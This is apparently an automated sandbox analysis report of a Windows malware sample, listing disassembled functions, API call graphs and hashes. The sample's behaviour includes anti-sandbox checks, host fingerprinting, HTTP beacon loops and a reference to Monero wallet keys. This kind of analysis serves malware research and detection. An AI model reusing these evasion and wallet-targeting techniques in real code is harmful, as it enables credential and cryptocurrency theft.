                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: 0R$0S$0T$0U$0V$0X$HttpQueryInfoA$InternetSetOptionA$PS$PT$PU$PV$pR$pS$pT$pU
                      • API String ID: 2238633743-1605884471
                      • Opcode ID: af9197872abccc924e69e03b4f269d4d4cdc9b4e54c9a26aa0e992b9e4e474ab
                      • Instruction ID: 4d0d9ae3543f3bea1dbf420a71b3a124d013330d9a8c6628a002ba910e9c9e60
                      • Opcode Fuzzy Hash: af9197872abccc924e69e03b4f269d4d4cdc9b4e54c9a26aa0e992b9e4e474ab
                      • Instruction Fuzzy Hash: 99621CB6510300AFC344EFA8EF8895677F9F78C301714C53AA609E3264D739A865DF6A
                      Function 001C6280 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1033 1c6280-1c630b call 1da7a0 call 1c47b0 call 1da740 InternetOpenA StrCmpCA 1040 1c630d 1033->1040 1041 1c6314-1c6318 1033->1041 1040->1041 1042 1c631e-1c6342 InternetConnectA 1041->1042 1043 1c6509-1c6525 call 1da7a0 call 1da800 * 2 1041->1043 1045 1c64ff-1c6503 InternetCloseHandle 1042->1045 1046 1c6348-1c634c 1042->1046 1062 1c6528-1c652d 1043->1062 1045->1043 1048 1c634e-1c6358 1046->1048 1049 1c635a 1046->1049 1051 1c6364-1c6392 HttpOpenRequestA 1048->1051 1049->1051 1053 1c6398-1c639c 1051->1053 1054 1c64f5-1c64f9 InternetCloseHandle 1051->1054 1056 1c639e-1c63bf InternetSetOptionA 1053->1056 1057 1c63c5-1c6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 1c642c-1c644b call 1d8940 1057->1058 1059 1c6407-1c6427 call 1da740 call 1da800 * 2 1057->1059 1067 1c644d-1c6454 1058->1067 1068 1c64c9-1c64e9 call 1da740 call 1da800 * 2 1058->1068 1059->1062 1071 1c6456-1c6480 InternetReadFile 1067->1071 1072 1c64c7-1c64ef InternetCloseHandle 1067->1072 1068->1062 1076 1c648b 1071->1076 1077 1c6482-1c6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 1c648d-1c64c5 call 1da9b0 call 1da8a0 call 1da800 1077->1080 1080->1071
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                      • HttpOpenRequestA.WININET(00000000,GET,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C6385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001C63FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C646D
                      • InternetCloseHandle.WININET(00000000), ref: 001C64EF
                      • InternetCloseHandle.WININET(00000000), ref: 001C64F9
                      • InternetCloseHandle.WININET(00000000), ref: 001C6503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ($ERROR$ERROR$GET
                      • API String ID: 3749127164-2906118479
                      • Opcode ID: d38943fd44b17974666f1171b838aa44bf8ac7edb62a6589565f38f2c08e8833
                      • Instruction ID: 63c63a5e952511414adeff31252e7845634c8e2e5646df24ce3a53c64f0e5449
                      • Opcode Fuzzy Hash: d38943fd44b17974666f1171b838aa44bf8ac7edb62a6589565f38f2c08e8833
                      • Instruction Fuzzy Hash: 1A716D71A00358ABDB14DBA0CC49FEE7778BF54700F5081A9F50A6B290DBB4AA85CF56
                      Function 001D5510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1090 1d5510-1d5577 call 1d5ad0 call 1da820 * 3 call 1da740 * 4 1106 1d557c-1d5583 1090->1106 1107 1d5585-1d55b6 call 1da820 call 1da7a0 call 1c1590 call 1d51f0 1106->1107 1108 1d55d7-1d564c call 1da740 * 2 call 1c1590 call 1d52c0 call 1da8a0 call 1da800 call 1daad0 StrCmpCA 1106->1108 1124 1d55bb-1d55d2 call 1da8a0 call 1da800 1107->1124 1134 1d5693-1d56a9 call 1daad0 StrCmpCA 1108->1134 1137 1d564e-1d568e call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1108->1137 1124->1134 1140 1d57dc-1d5844 call 1da8a0 call 1da820 * 2 call 1c1670 call 1da800 * 4 call 1d6560 call 1c1550 1134->1140 1141 1d56af-1d56b6 1134->1141 1137->1134 1272 1d5ac3-1d5ac6 1140->1272 1142 1d56bc-1d56c3 1141->1142 1143 1d57da-1d585f call 1daad0 StrCmpCA 1141->1143 1146 1d571e-1d5793 call 1da740 * 2 call 1c1590 call 1d52c0 call 1da8a0 call 1da800 call 1daad0 StrCmpCA 1142->1146 1147 1d56c5-1d5719 call 1da820 call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1142->1147 1161 1d5865-1d586c 1143->1161 1162 1d5991-1d59f9 call 1da8a0 call 1da820 * 2 call 1c1670 call 1da800 * 4 call 1d6560 call 1c1550 1143->1162 1146->1143 1250 1d5795-1d57d5 call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1146->1250 1147->1143 1167 1d598f-1d5a14 call 1daad0 StrCmpCA 1161->1167 1168 1d5872-1d5879 1161->1168 1162->1272 1197 1d5a28-1d5a91 call 1da8a0 call 1da820 * 2 call 1c1670 call 1da800 * 4 call 1d6560 call 1c1550 1167->1197 1198 1d5a16-1d5a21 Sleep 1167->1198 1174 1d587b-1d58ce call 1da820 call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1168->1174 1175 1d58d3-1d5948 call 1da740 * 2 call 1c1590 call 1d52c0 call 1da8a0 call 1da800 call 1daad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 1d594a-1d598a call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1175->1276 1197->1272 1198->1106 1250->1143 1276->1167
                      APIs
                        • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                        • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D56A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5857
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                        • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D532F
                        • Part of subcall function 001D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                        • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D5383
                        • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D53AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5A0C
                      • Sleep.KERNEL32(0000EA60), ref: 001D5A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$pW
                      • API String ID: 507064821-2622519717
                      • Opcode ID: 948b29ce05f72a2bb61a3a39cb1ae68c0527fa5fac63e0e87d4fcf5d74970f96
                      • Instruction ID: 8d15e22a190222905b3b0bd1e0a468d077639097251ff822dfa396082b00f2a4
                      • Opcode Fuzzy Hash: 948b29ce05f72a2bb61a3a39cb1ae68c0527fa5fac63e0e87d4fcf5d74970f96
                      • Instruction Fuzzy Hash: 8CE14772910144AACB14FBA0DD92EED7339AF74301F90812AF40667291EF35AF19DB96
                      Function 001D17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1301 1d17a0-1d17cd call 1daad0 StrCmpCA 1304 1d17cf-1d17d1 ExitProcess 1301->1304 1305 1d17d7-1d17f1 call 1daad0 1301->1305 1309 1d17f4-1d17f8 1305->1309 1310 1d17fe-1d1811 1309->1310 1311 1d19c2-1d19cd call 1da800 1309->1311 1313 1d199e-1d19bd 1310->1313 1314 1d1817-1d181a 1310->1314 1313->1309 1316 1d185d-1d186e StrCmpCA 1314->1316 1317 1d187f-1d1890 StrCmpCA 1314->1317 1318 1d1835-1d1844 call 1da820 1314->1318 1319 1d18f1-1d1902 StrCmpCA 1314->1319 1320 1d1951-1d1962 StrCmpCA 1314->1320 1321 1d1970-1d1981 StrCmpCA 1314->1321 1322 1d1913-1d1924 StrCmpCA 1314->1322 1323 1d1932-1d1943 StrCmpCA 1314->1323 1324 1d18ad-1d18be StrCmpCA 1314->1324 1325 1d18cf-1d18e0 StrCmpCA 1314->1325 1326 1d198f-1d1999 call 1da820 1314->1326 1327 1d1849-1d1858 call 1da820 1314->1327 1328 1d1821-1d1830 call 1da820 1314->1328 1332 1d187a 1316->1332 1333 1d1870-1d1873 1316->1333 1334 1d189e-1d18a1 1317->1334 1335 1d1892-1d189c 1317->1335 1318->1313 1340 1d190e 1319->1340 1341 1d1904-1d1907 1319->1341 1346 1d196e 1320->1346 1347 1d1964-1d1967 1320->1347 1349 1d198d 1321->1349 1350 1d1983-1d1986 1321->1350 1342 1d1926-1d1929 1322->1342 1343 1d1930 1322->1343 1344 1d194f 1323->1344 1345 1d1945-1d1948 1323->1345 1336 1d18ca 1324->1336 1337 1d18c0-1d18c3 1324->1337 1338 1d18ec 1325->1338 1339 1d18e2-1d18e5 1325->1339 1326->1313 1327->1313 1328->1313 1332->1313 1333->1332 1353 1d18a8 1334->1353 1335->1353 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1343 1343->1313 1344->1313 1345->1344 1346->1313 1347->1346 1349->1313 1350->1349 1353->1313
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 001D17C5
                      • ExitProcess.KERNEL32 ref: 001D17D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                      • Instruction ID: 3b5545bfde25496e994b35395ece2a6ae118fc99518c2b14f2548c027678cf54
                      • Opcode Fuzzy Hash: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                      • Instruction Fuzzy Hash: 9C514DB5A0420AFFCB08DFE1D9A4ABE77B5BF44708F10905AE406A7350D770EA51DB62
                      Function 001D7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1356 1d7500-1d754a GetWindowsDirectoryA 1357 1d754c 1356->1357 1358 1d7553-1d75c7 GetVolumeInformationA call 1d8d00 * 3 1356->1358 1357->1358 1365 1d75d8-1d75df 1358->1365 1366 1d75fc-1d7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 1d75e1-1d75fa call 1d8d00 1365->1367 1369 1d7619-1d7626 call 1da740 1366->1369 1370 1d7628-1d7658 wsprintfA call 1da740 1366->1370 1367->1365 1377 1d767e-1d768e 1369->1377 1370->1377
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001D7542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D760A
                      • wsprintfA.USER32 ref: 001D7640
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\
                      • API String ID: 1544550907-3809124531
                      • Opcode ID: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                      • Instruction ID: ac925e86425f109bf996a0a4a0a7a367a429866c99c26f13d6bbf8797ee8b4dd
                      • Opcode Fuzzy Hash: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                      • Instruction Fuzzy Hash: 024181B1D04358ABDB10DF94DC45BEEBBB8AF18704F10419AF509772C0E775AA44CBA5
                      Function 001D69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 001D98A1
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32368), ref: 001D98BA
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32170), ref: 001D98D2
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 001D98EA
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 001D9903
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E38FA0), ref: 001D991B
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E258F0), ref: 001D9933
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E25870), ref: 001D994C
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32338), ref: 001D9964
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32398), ref: 001D997C
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E32380), ref: 001D9995
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E323E0), ref: 001D99AD
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 001D99C5
                        • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,00E323F8), ref: 001D99DE
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001C11D0: ExitProcess.KERNEL32 ref: 001C1211
                        • Part of subcall function 001C1160: GetSystemInfo.KERNEL32(?), ref: 001C116A
                        • Part of subcall function 001C1160: ExitProcess.KERNEL32 ref: 001C117E
                        • Part of subcall function 001C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                        • Part of subcall function 001C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                        • Part of subcall function 001C1110: ExitProcess.KERNEL32 ref: 001C1143
                        • Part of subcall function 001C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                        • Part of subcall function 001C1220: ExitProcess.KERNEL32 ref: 001C1294
                        • Part of subcall function 001D6770: GetUserDefaultLangID.KERNEL32 ref: 001D6774
                        • Part of subcall function 001C1190: ExitProcess.KERNEL32 ref: 001C11C6
                        • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                        • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                        • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                        • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                        • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                        • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                      • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                      • Sleep.KERNEL32(00001770), ref: 001D6B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                      • ExitProcess.KERNEL32 ref: 001D6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2931873225-0
                      • Opcode ID: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                      • Instruction ID: 56848e4a0d9a8341872a63fbb8e8a46d62d9e76056a42421ad43ddb698981f75
                      • Opcode Fuzzy Hash: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                      • Instruction Fuzzy Hash: C6312371940218ABDB04F7F0DC56FEE7778AF24301F90452AF502A22D2DF749905D7A6
                      Function 001D6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1436 1d6af3 1437 1d6b0a 1436->1437 1439 1d6b0c-1d6b22 call 1d6920 call 1d5b10 CloseHandle ExitProcess 1437->1439 1440 1d6aba-1d6ad7 call 1daad0 OpenEventA 1437->1440 1446 1d6ad9-1d6af1 call 1daad0 CreateEventA 1440->1446 1447 1d6af5-1d6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
